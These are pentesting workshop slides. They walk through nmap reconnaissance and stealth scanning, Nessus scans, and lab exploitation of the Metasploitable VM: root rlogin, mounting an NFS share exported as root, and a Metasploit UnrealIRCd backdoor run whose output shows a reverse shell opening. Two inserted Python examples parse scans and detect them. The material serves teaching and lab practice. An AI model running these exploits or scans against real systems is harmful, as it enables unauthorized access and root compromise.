Pentesting An Introduction

Post on 23-Oct-2020


  • Pentesting: An Introduction

  • Workshop Flow – 1

    • Nature of Cyber Security Problem (Slides 4-7)

    • Introduction – Pentesting - what, why, how (8-9)

    • Pentesting - Intelligence Gathering (10-11)

    • Pentesting tools Demo– Kali Linux, NMAP (12)

    • Intelligence Gathering using WhoIS (13-15)

    • Metasploitable OS – An Introduction (16)

    • Pentest Lab 1.1 - Setup Vmware/ Virtual Box, Kali Linux VM, Metasploitable VM, Familiarity with Kali Linux, WhoIs

    • Intelligence Gathering using NMAP (18-36)

      • Host Discovery

      • Port Scanning

      • OS Detection

      • Services and Version Detection

    • Pentest Lab 1.2 – Intelligence Gathering with NMAP

  • Workshop Flow - 2

    • Vulnerability Analysis (38-39)

    • Scanning with Nessus (40-42)

    • Understanding Nessus Vulnerability Report (43)

    • Understand Vulnerabilities, where do they arise from? (44)

    • Exploiting Vulnerabilities – Metasploit and Tools (45-54)

      • Rlogin

      • NFS-Share

      • Metasploit

    • Approach to security --- Threat Modelling (55)

    • Pentest Lab 1.3

      • Scanning with Nessus, Analysing the Report

      • Exploit Vulnerability 1, Tools

      • Exploit Vulnerability 2, Tools

      • Exploit Vulnerability 3, 4 using Metasploit

  • Black Hat – White Hat (A Game)

    • Securing Our Home – A perspective

  • Security is a Game of Survival

    To survive, the deer should run faster than the tiger

    To survive, the tiger should run faster than the deer

  • Physical Security vs Cyber Security

    • How similar/ different?

      • Intent

      • Nature of the problem: Internet, global boundaries, glorified hackers, attack tools, standards, underworld economy, accountability, who is the adversary

      • Strategy (attack and defense): weakest link strategy, all bases covered strategy, insider attack, policies at different levels etc.

    • Are they separate any more?

      • Spyware

      • Financial malware

  • Security Problem Solving

    • Security: a Negative Goal.

      • Achieve something despite whatever the adversary might do.

      • Positive goal: “Ram can read grades.txt". Ask Ram to check that it works. Easy to check.

      • Negative goal: “Shyam cannot read grades.txt". Check whether Shyam cannot read grades.txt? Good to check, but not nearly enough. Must reason about all possible ways in which Shyam might get the data.

      • How might Shyam try to get the contents of grades.txt? Change permissions, steal the file, impersonate, etc.

    • Open-ended problem. No absolute definitive answer.

    • Threat Model concept & problem solving

  • Pentesting – What, Why, How

    • Pentesting : An Attack on a system in hopes of finding security weaknesses

    • Rationale : Improving the security of your site by breaking into it

    • How : Using Attacker’s Techniques

  • Pentesting – How is it usually done

    • Intelligence/ Information Gathering

    • Information Analysis and Planning – Component relationships, target identification etc.

    • Vulnerability Detection

    • Penetration – Developing/ Customising, Choosing Exploit tools

    • Attack/Privilege Escalation

    • Analysis and reporting

    • Clean-up

  • Intelligence Gathering

    • What are we looking for? Organizational intelligence, access point discovery, network discovery, infrastructure fingerprinting

    • Open Source Intelligence

      • Corporate Information: location, org chart, document metadata, network, email addresses, applications used, purchase agreements, defense technologies used (fingerprinting), financial information etc.

      • Individual Information: all about the individual, social engineering

    • Covert Intelligence: through individuals

    • Footprinting (next slide)

    • Identify Protection Systems (network, host, application, storage etc.)

  • Intelligence Gathering - Footprinting

    • Passive Reconnaissance: whois lookup, BGP looking glasses

    • Active Footprinting: port scanning, banner grabbing, SNMP sweeps, DNS discovery, forward/ reverse DNS, web application discovery, virtual host detection

    • Establish Target List : Versions, Weak web applications, Patch level

  • Kali Linux - Demo

    A Collection of all Cyber Security related tools

    Tools for Information Collection

    Some info gathering tools

    Some Possible Recon-ng/ Harvester, Maltego, NMAP, Burpsuite, Nessus/ Acunetix

  • Footprint - First Data

    • IP address (some IP address in the network to start with)... hunting IP addresses

    • whois is normally a good place to start... Maltego?... email IDs, headers

  • Whois lookup

    • Install it on your linux distro by entering apt-get install whois in terminal

    • https://registry.in/whois/nita.ac.in

    Domain Name: NITA.AC.IN
    Registry Domain ID: D3544155-AFIN
    Registrar WHOIS Server:
    Registrar URL: http://www.ernet.in
    Updated Date: 2017-03-02T07:21:44Z
    Creation Date: 2009-04-06T05:03:46Z
    Registry Expiry Date: 2019-04-06T05:03:46Z
    Registrar Registration Expiration Date:
    Registrar: ERNET India
    Registrar IANA ID: 800068
    Registrar Abuse Contact Email:
    Registrar Abuse Contact Phone:
    Reseller:
    Domain Status: ok
    Registrant Organization: National Institute of Technology, Agartala
    Registrant State/Province:
    Registrant Country: IN
    Name Server: ns1.nkn.in
    Name Server: ns2.nkn.in
    DNSSEC: unsigned
    URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
    >>> Last update of WHOIS database: 2018-06-25T15:58:44Z


  • Whois lookup

    root@kali:~# ping ns1.nkn.in
    PING ns1.nkn.in (180.149.63.3) 56(84) bytes of data.

    64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=1 ttl=56 time=40.3 ms

    64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=2 ttl=56 time=45.0 ms

    64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=3 ttl=56 time=46.1 ms

    64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=4 ttl=56 time=45.3 ms

    64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=5 ttl=56 time=44.5 ms

    --- ns1.nkn.in ping statistics ---

    5 packets transmitted, 5 received, 0% packet loss, time 7715ms

    rtt min/avg/max/mdev = 40.333/44.292/46.140/2.048 ms

  • Metasploitable - Introduction

    • An intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities.

    • Used for Labs to exploit

    • This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

    • Created by the Rapid7 Metasploit team

    • Metasploitable login is “msfadmin”; the password is also “msfadmin”

  • Lab 1.1

    • Lab Setup

    • Virtual Box/ Vmware

    • Kali Linux, Metasploitable

    • Kali Linux Tools

    • Metasploitable

    • Testing communication between Kali Linux, Metasploitable server

    • Whois

  • NMAP

    • nmap is an open-source port/security scanner

    • Its primary function is the discovery and mapping of hosts on a network

    • nmap is consistently voted one of the most used security tools

    • Needs as input a range or some specific addresses

  • NMAP

    • Host Discovery – Identifying computers on a network

    • Port Scanning – Enumerating the open ports on one or more target computers

    • Version Detection – Interrogating network services listening on remote computers to determine the application name and version number

    • OS Detection – Remotely determining the operating system from network devices

  • NMAP Demo (Script)

    Run nmap command on Kali Linux Terminal.

    Sample Syntax:

    nmap [Scan Type(s)] [Options] {target specification}

    TARGET SPECIFICATION:

    Can pass hostnames, IP addresses, networks, etc.

    Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254

    -iL <inputfilename>: Input from list of hosts/networks

    -iR <num hosts>: Choose random targets

    --exclude <host1[,host2][,host3],...>: Exclude hosts/networks

    --excludefile <exclude_file>: Exclude list from file

    nmap -v -A ... then look at the report nmap_report_1.txt in the Kali Linux reports folder

  • NMAP Host Discovery

    • Querying multiple hosts using this method is referred to as ping sweeps …sweep through a range of IP addresses

    • The most basic step in mapping out a network.

    • Several sweep techniques

      • ARP Sweep (default)

      • ICMP Sweeps

      • Broadcast ICMP

      • Non-Echo ICMP

      • TCP sweep

      • UDP sweep

  • Host Discovery : ARP Sweep “nmap 10.0.2.0/24 -sn”

  • Host Discovery : ICMP Sweeps

    • Used by nmap when there is a router in between (WAN)

    • Technique

      • Send an ICMP ECHO request (ICMP type 8)

      • If an ICMP ECHO reply (ICMP type 0) is received: the target is alive

      • No response: the target is down

    • Pros & Cons

      • Easy to implement

      • Fairly slow, easy to block

    Scanner -> Target: ICMP ECHO request
    Target -> Scanner: ICMP ECHO reply        => the host is alive

    Scanner -> Target: ICMP ECHO request
    (no response)                             => the host is down/filtered

  • Host Discovery : TCP Sweeps

    • Sending TCP ACK or TCP SYN packets

    • The port number can be selected to avoid blocking by the firewall

      • Usually a good pick would be 21 / 22 / 23 / 25 / 80

    • But.. firewalls can spoof a RESET packet for an IP address, so TCP Sweeps may not be reliable.

  • Host Discovery : UDP Sweeps

    • Relies on the ICMP PORT UNREACHABLE

    • Assume the port is open if no ICMP PORT UNREACHABLE message is received after sending a UDP datagram

    • Cons:

      • Routers can drop UDP packets as they cross the Internet

    • Many UDP services do not respond when correctly probed

    • Firewalls are usually configured to drop UDP packets (except for DNS)

    • UDP sweep relies on the fact that a non-active UDP port will respond with an ICMP PORT UNREACHABLE message

  • NMAP Host Discovery summary

    • -sL: List Scan - simply list targets to scan

    • -sn: Ping Scan - go no further than determining if host is online

    • -PN: Treat all hosts as online -- skip host discovery

    • -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports

    • -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes

    • -PO [protocol list]: IP Protocol Ping

    • -n/-R: Never do DNS resolution/Always resolve [default: sometimes]

    • --dns-servers <serv1[,serv2],...>: Specify custom DNS servers

    • --system-dns: Use OS's DNS resolver

    • -sU: UDP Scan

    Demo, and look at the Wireshark capture:

    root@kali:~# nmap -sn 10.0.2.4
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:36 EDT
    Nmap scan report for 10.0.2.4
    Host is up (0.00026s latency).
    MAC Address: 08:00:27:1A:23:D5 (Oracle VirtualBox virtual NIC)
    Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

  • Port Scanning : TCP Connect Scan

    • Uses the basic TCP connection establishment mechanism; completes the 3-way handshake

    • Easy to detect by inspecting the system log

    • Normally not used since expensive

    Scanner -> Target: SYN
    Target -> Scanner: SYN/ACK
    Scanner -> Target: ACK                    => the port is open

    Scanner -> Target: SYN
    Target -> Scanner: RST/ACK                => the port is closed

  • Port Scanning : TCP SYN scan

    • Does not establish a complete connection (half-open scanning)

    • Send a SYN packet and wait for a response

    • If a SYN/ACK is received => the port is LISTENING; immediately tear down the connection by sending a RESET

    • If an RST/ACK is received => a non-LISTENING port

    • nmap -Pn is a SYN scan for all ports

    Scanner -> Target: SYN
    Target -> Scanner: SYN/ACK
    Scanner -> Target: RST                    => the port is open

    Scanner -> Target: SYN
    Target -> Scanner: RST/ACK                => the port is closed

  • Port Scanning : Stealth Scan

    • To gather information about target sites while avoiding detection

    • Try to hide among normal network traffic; not logged by the logging mechanism (stealth)

    • Techniques

      • Flag probe packets (also called “inverse mapping”)

        • A response is sent back only by a closed port; by determining what services do not exist, an intruder can infer what services do exist

      • Slow scan rate: difficult to detect => needs a long history log

    CERT reported this technique in CERT® Incident Note IN-98.04

    http://www.cert.org/incident_notes/IN-98.04.html
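The defender's side of the three port-scanning slides above, as an added example that is not part of the deck: a connection-log detector that counts distinct ports touched per source inside a sliding time window. A short window catches the fast connect/SYN scan; the slow “stealth” scan only shows up when the window, and therefore the retained history log, is long enough. The log format, addresses and timings are constructed for the example.

```python
"""Added example (not from the slides): flag port scans in a connection log.

Assumed, constructed log format, one line per connection attempt:
    <epoch seconds> <src ip> <dst ip> <dst port> <accepted|refused>
'accepted' is a completed 3-way handshake (what a TCP connect scan leaves
in a system log); 'refused' is a RST/ACK from a closed port.
"""
from collections import defaultdict


def build_sample_log():
    """Construct sample lines: one fast scanner, one slow scanner, one normal client."""
    ports = [21, 22, 23, 25, 53, 80, 110, 111, 139, 143, 443, 445]
    lines = []
    # 10.0.2.15 probes all 12 ports within 3 seconds.
    for i, p in enumerate(ports):
        lines.append(f"{1000 + i // 4} 10.0.2.15 10.0.2.4 {p} refused")
    # 10.0.2.99 probes one port every 10 minutes (a slow, "stealthy" scan).
    for i, p in enumerate(ports):
        lines.append(f"{2000 + i * 600} 10.0.2.99 10.0.2.4 {p} refused")
    # 10.0.2.7 is an ordinary client talking to the web port only.
    for i in range(20):
        lines.append(f"{1500 + i * 5} 10.0.2.7 10.0.2.4 80 accepted")
    return lines


def parse_line(line):
    ts, src, dst, port, outcome = line.split()
    return int(ts), src, dst, int(port), outcome


def scan_sources(lines, window, threshold):
    """Return {src: peak} for sources that touched at least `threshold`
    distinct (dst, port) pairs inside some `window`-second span.

    A short window catches fast scans; slow scans only show up when the
    window (and therefore the retained log history) is long enough.
    """
    events = defaultdict(list)
    for line in lines:
        ts, src, dst, port, _outcome = parse_line(line)
        events[src].append((ts, (dst, port)))

    flagged = {}
    for src, evs in events.items():
        evs.sort()
        peak, lo = 0, 0
        for hi in range(len(evs)):
            # Slide the left edge until the span fits inside the window.
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            peak = max(peak, len({target for _, target in evs[lo:hi + 1]}))
        if peak >= threshold:
            flagged[src] = peak
    return flagged


if __name__ == "__main__":
    log = build_sample_log()
    print("60 s window :", scan_sources(log, window=60, threshold=10))
    print("2 h window  :", scan_sources(log, window=7200, threshold=10))
```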

  • Port Scanning : Stealth Mapping

    • RFC 793: how to handle wrong-state packets

      • Closed ports: reply with a RESET packet to wrong-state packets

      • Open ports: ignore the packet in question

    • Technique

      • A RST scan

      • A FIN probe, with the FIN TCP flag set (e.g. nmap -sF -p25, and capture)

      • An XMAS probe, with the FIN, URG, ACK, SYN, RST, PUSH flags set (e.g. nmap -sX -p27)

  • Port Scanning with nmap

    • SCAN TECHNIQUES:

      • -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans

      • -sN/sF/sX: TCP Null, FIN, and Xmas scans

      • -b <FTP relay host>: FTP bounce scan

    • PORT SPECIFICATION AND SCAN ORDER:

      • -p <port ranges>: Only scan specified ports

        Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080

      • -F: Fast mode - Scan fewer ports than the default scan

      • -r: Scan ports consecutively - don't randomize

      • --top-ports <number>: Scan <number> most common ports

      • --port-ratio <ratio>: Scan ports more common than <ratio>

    Demo: Look at the Wireshark capture of nmap -sP x.x.x.x (uses SYN scan; colorized conversations)

    nmap -Pn 10.0.2.4
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:14 EDT
    Nmap scan report for 10.0.2.4
    Host is up (0.00037s latency).
    Not shown: 977 closed ports
    PORT   STATE SERVICE
    21/tcp open  ftp
    22/tcp open  ssh
    23/tcp open  telnet

  • Services and Versions Detection

    • The nmap-service-probes database contains probes for querying various services and match expressions to recognize and parse responses

  • Operating System Detection

    • Banner, DNS HINFO and …

    • TCP/IP fingerprinting (IP stack implementations respond differently)

    • FIN probe, Bogus Flag probe

    • TCP initial sequence number sampling, TCP initial window, ACK value

    • ICMP error quenching, message quoting, ICMP echo integrity

    • IP: DF, TOS, Fragmentation

  • OS Detection : Examples

    • ACK: sending FIN|PSH|URG to a closed port

      • Most OSes: ACK with the same sequence number

      • Windows: ACK with sequence number+1

    • Type of Service: probing with an ICMP_PORT_UNREACHABLE message

      • Most OSes: TOS = 0

      • Linux: TOS = 0xC0

  • Version and OS Detection with nmap

    • SERVICE/VERSION DETECTION:

    • -sV: Probe open ports to determine service/version info

    • --version-intensity <level>: Set from 0 (light) to 9 (try all probes)

    • --version-light: Limit to most likely probes (intensity 2)

    • --version-all: Try every single probe (intensity 9)

    • --version-trace: Show detailed version scan activity (for debugging)

    • OS DETECTION:

    • -O: Enable OS detection

    • --osscan-limit: Limit OS detection to promising targets

    • --osscan-guess: Guess OS more aggressively

    Demo -sV and wireshark capture

    root@kali:~# nmap -sV 10.0.2.4

    Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 06:01 EDT

    Nmap scan report for 10.0.2.4

    Host is up (0.00010s latency).

    Not shown: 977 closed ports

    PORT STATE SERVICE VERSION

    21/tcp open ftp vsftpd 2.3.4

    22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

  • Lab 1.2

    • Workshop Lab Document

  • Vulnerabilities

    • According to Wikipedia:

    “The word vulnerability, in computer security, refers to a weakness in a system allowing an attacker to violate the confidentiality, integrity, availability, access control, consistency or audit mechanisms of the system or the data and applications it hosts”

    • To software developers, a bug is synonymous with a vulnerability.

      • Ex: errors in a program’s source code or flawed program design

      • Buffer overflows, memory leaks, deadlocks, arithmetic overflow, accessing protected memory (access violation)

    • The software bugs we are speaking of are used as the foundation to form an exploit. A security attack on a vulnerability is an exploit.

  • Vulnerabilities

    Using Nmap or any scanner, have we found any hosts worthwhile? The next step should be scanning for exploitable vulnerabilities.

    What could be the approach?

    • What data do we have till now?

    Hosts, Open Ports, Operating System, Applications Running, Versions

    • How could we use this data? Use this data to find vulnerabilities using various resources on the net (exploit DB, CVE database, other databases)

    Or

    • Use a Vulnerability Scanner
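As an added example, not part of the deck, the following Python turns the `nmap -sV` normal output shown earlier into exactly the data this slide lists (hosts, open ports, services, versions) and then picks out what to chase next: versioned services become lookup terms for the CVE/Exploit DB step, and services the later slides treat as findings by their mere existence (telnet, rlogin, NFS) are flagged outright. The sample output is constructed after the scan of 10.0.2.4 in the slides, with the telnet, rlogin and NFS lines added; the service list in `RISKY_BY_EXISTENCE` is this example's own choice.

```python
"""Added example (not from the slides): turn `nmap -sV` normal output into the
inventory the deck asks for (hosts, open ports, services, versions) and pull
out the items worth a vulnerability lookup."""
import re

# Constructed sample modelled on the slides' scan of 10.0.2.4; the telnet,
# rlogin and NFS lines are added to cover services the deck exploits later.
SAMPLE_NMAP_SV = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 06:01 EDT
Nmap scan report for 10.0.2.4
Host is up (0.00010s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.4
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet  Linux telnetd
513/tcp  open  login   OpenBSD or Solaris rlogin
2049/tcp open  nfs     2-4 (RPC #100003)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Services whose mere presence is a finding (the Nessus "Service Detection"
# family): cleartext or trust-based protocols. Assumed list for this example.
RISKY_BY_EXISTENCE = {
    "telnet": "cleartext login",
    "login": "rlogin trust-based authentication",
    "shell": "rsh trust-based authentication",
    "nfs": "check exported shares with showmount -e",
}


def parse_nmap_sv(text):
    """Return {host: [ {port, proto, state, service, version}, ... ]}."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service, version = m.groups()
            hosts[current].append({"port": int(port), "proto": proto,
                                   "state": state, "service": service,
                                   "version": version.strip()})
    return hosts


def triage(hosts):
    """Findings to chase next, as (host, port, reason) tuples.

    Versioned services become search terms for CVE / Exploit DB lookups;
    services in RISKY_BY_EXISTENCE are flagged even without a version."""
    findings = []
    for host, ports in hosts.items():
        for p in ports:
            if p["state"] != "open":
                continue
            if p["service"] in RISKY_BY_EXISTENCE:
                findings.append((host, p["port"], RISKY_BY_EXISTENCE[p["service"]]))
            elif p["version"]:
                findings.append((host, p["port"], "lookup: " + p["version"]))
    return findings


if __name__ == "__main__":
    for finding in triage(parse_nmap_sv(SAMPLE_NMAP_SV)):
        print(*finding)
```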

  • Vulnerability Scanner - Nessus

    • Nessus is a proprietary vulnerability scanner with Home version free

    • Nessus runs a set of exploits on the open ports and reports vulnerabilities

    • Vulnerability checks are implemented through plugins.

    • Plugins are written in Nessus Attack Scripting Language (NASL), a scripting language optimized for custom network interaction.

    • New plugins are added as vulnerabilities are discovered.

    • Many plugins check for a vulnerability by actually exploiting the vulnerability.

    • The ‘safe checks’ option specifies that no vulnerability check capable of crashing a remote host be used (such as DOS attacks).

    • DEMO... look at Basic scan and Plugins

  • Vulnerability Scanner - Nessus

    • Download Nessus

    • On Kali Linux terminal run /etc/init.d/nessusd start

    You will see: Starting Nessus....

    • Go to https://127.0.0.1:8834/#/

  • Vulnerabilities

    Now we know the vulnerabilities

    What’s our goal with this knowledge?

    - Understand where Vulnerabilities arise from (to Prevent in future)

    - Understand how exploitations happen (to be able write signatures/ exploit detection)

    Understand the vulnerability, categories/ families? (Nessus Families?)

    Find a tool to Exploit/ Write an exploit

    Metasploit – Rapid7…Demo

  • Vulnerability – Rlogin Exploit

    If we look at the Family column of the Nessus report, we see some simple ones

    - Backdoor

    - Gain a shell remotely

    - Service Detection – Existence of the service itself indicates vulnerability. Let’s try to exploit “rlogin service detection”

    - Click on rlogin Service Detection in nessus report to get details

    On Kali Linux Install rsh-client (for rlogin command else it defaults to ssh)

    apt-get install rsh-client

    rlogin -l root 10.0.2.4
    Last login: Thu Jun 28 07:28:57 EDT 2018 from :0.0 on pts/0

    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

    Snip….Snip

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

    applicable law.

    To access official Ubuntu documentation, please visit:

    http://help.ubuntu.com/

    You have new mail.

    root@metasploitable:~#

  • Vulnerability – NFS Share Exploit

    - Let’s try to exploit “nfs exported share information disclosure”

    - Click on the same in the Nessus report to get details

    On Kali Linux install rpcbind (only if you want to recheck whether nfs is running) and nfs-common

    apt-get install rpcbind

    apt-get install nfs-common

    root@kali:~# showmount -e 10.0.2.4

    Export list for 10.0.2.4:

    / *

    root@kali:~# mkdir /tmp/r00t

    root@kali:~# mount -t nfs 10.0.2.4:/ /tmp/r00t/

    root@kali:~# ls

    amit_passwd Documents Music Pictures Templates Videos

    Desktop Downloads 'nmap scan reports' Public trojan.exe

  • Vulnerabilities – Exploit Payload

    • Exploits are commonly used to install system malware or gain system access or recruit client machines into an existing ‘botnet’.

    • This is accomplished with the help of a payload

    • The payload is a sequence of code that is executed when the vulnerability is triggered

    • To make things clear, an Exploit is really broken up into two parts, like so;

    EXPLOIT = Vulnerability + Payload;

    • Different payload types exist and they accomplish different tasks

      • exec → Execute a command or program on the remote system

      • download_exec → Download a file from a URL and execute

      • upload_exec → Upload a local file and execute

      • adduser → Add user to system accounts

  • Metasploit Framework

    What is the Metasploit Framework?

    • According to the Metasploit Team;

    “The Metasploit Framework is a platform for writing, testing, and using

    exploit code. The primary users of the Framework are professionals

    performing penetration testing, shellcode development, and

    vulnerability research.”

  • Metasploit Framework

    • The MSF is not only an environment for exploit development but also a platform for launching exploits on real-world applications. It is packaged with real exploits that can provide real damage if not used professionally.

    • Because MSF is an open-source tool that provides such a simplified method for launching dangerous attacks, it has attracted and still attracts blackhat and whitehat beginners. Fairly dangerous.

  • Vulnerabilities – Exploits using Metasploit

    db_nmap -v -T4 -PA -sV --version-all --osscan-guess -A -sS -p 1-65535

    Scans Metasploitable

  • Vulnerabilities – Exploits using Metasploit

    • Run the following command: services

    • Compare with the Nessus report

  • Vulnerabilities – Exploits using Metasploit

    Usually the sequence for exploiting is

    - Search for the exploit/ payload using the command “search xxx”. The search can be on multiple keywords related to the vulnerability, e.g. CVE, module etc.

    - “use <module>”

    - “info” to get information on the exploit

    - “run” to execute the exploit

  • Vulnerabilities – UnrealIRCd Backdoor Detection

    - Click on UnrealIRCd Backdoor Detection in the Nessus report

    Provides information including the CVE no. ‘CVE-2010-2075’

    - In Metasploit, ‘search CVE-2010-2075’ gives

    msf exploit(unix/irc/unreal_ircd_3281_backdoor) > search cve-2010-2075

    Matching Modules
    ================

    Name                                        Disclosure Date  Rank       Description
    ----                                        ---------------  ----       -----------
    exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution

    - ‘use exploit/unix/irc/unreal_ircd_3281_backdoor’ gives the cursor

    msf exploit(unix/irc/unreal_ircd_3281_backdoor) >

    - ‘info’ provides information on the payload. RHOST is not set

    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2075

  • Vulnerabilities – UnrealIRCd Backdoor Detection

    msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 10.0.2.4

    RHOST => 10.0.2.4

    msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run

    [*] Started reverse TCP double handler on 10.0.2.15:4444

    [*] 10.0.2.4:6667 - Connected to 10.0.2.4:6667...

    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...

    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

    [*] 10.0.2.4:6667 - Sending backdoor command...

    [*] Accepted the first client connection...

    [*] Accepted the second client connection...

    [*] Command: echo NkKbs49F8lfv25Hf;

    [*] Writing to socket A

    [*] Writing to socket B

    [*] Reading from sockets...

    [*] Reading from socket B

    [*] B: "NkKbs49F8lfv25Hf\r\n"

    [*] Matching...

    [*] A is input...

    [*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.4:60006) at 2018-06-28 12:20:03 -0400


  • Security Approach – Threat Modeling

    Structured approach to identifying, quantifying, and addressing threats.

    In threat modeling, we cover the three main elements:

    • Assets: What valuable data and equipment should be secured?

    • Threats: What may an attacker do to the system?

    • Vulnerabilities: What flaws in the system allow an attacker to realize a threat?

    Possible Steps to Threat Modeling

    • Identify the Assets

    • Describe the Architecture

    • Break down the Applications

    • Identify the Threats

    • Document and Classify the Threats

    • Rate the Threats

  • Lab 1.3

    Nessus Scan – Metasploitable

    Look at Vulnerabilities

    2 Vulnerabilities without Metasploit

    Metasploit Commands

    2 Vulnerabilities with Metasploit